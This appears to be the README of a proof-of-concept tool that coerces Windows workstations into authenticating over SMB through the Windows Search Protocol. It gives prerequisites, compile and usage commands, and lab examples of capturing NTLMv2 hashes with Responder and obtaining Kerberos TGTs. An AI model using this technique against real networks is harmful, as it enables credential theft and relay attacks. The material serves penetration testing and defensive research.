PoC to coerce authentication from Windows hosts using MS-WSP
It's a tool to interact with remote hosts using the Windows Search Protocol and coerce authentication. The target host will connect over SMB to the listener host using the machine account.
- Relay the authentication from the target to another system (if SMB signing is disabled)
- Obtain the TGT of the target (if coercing to a system where unconstrained delegation is enabled)
- Must be running in the context of a domain user (no specific privileges required on target system AFAIK)
- 445/TCP open on the target system
- 445/TCP open on the listener system
- Windows Search Service running on the target system
Note: The Windows Search Service is NOT enabled by default on Windows Server so in practice this attack is only effective against Windows workstations.
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WSPCoerce.cs
WSPCoerce.exe <target> <listener>
Notes:
- Can't use an IP address for the target, use a short hostname only (no FQDN)
- Make sure to use a hostname or FQDN for the listener if you want to receive Kerberos auth
- Target: LABWS1
- Listener: Kali box
Search request sent to LABWS1:
NTLMv2 captured on Responder:
- Target: LABWS1
- Listener: LABSRV1
Search request sent to LABWS1:
Kerberos TGT on listener (LABSRV1):
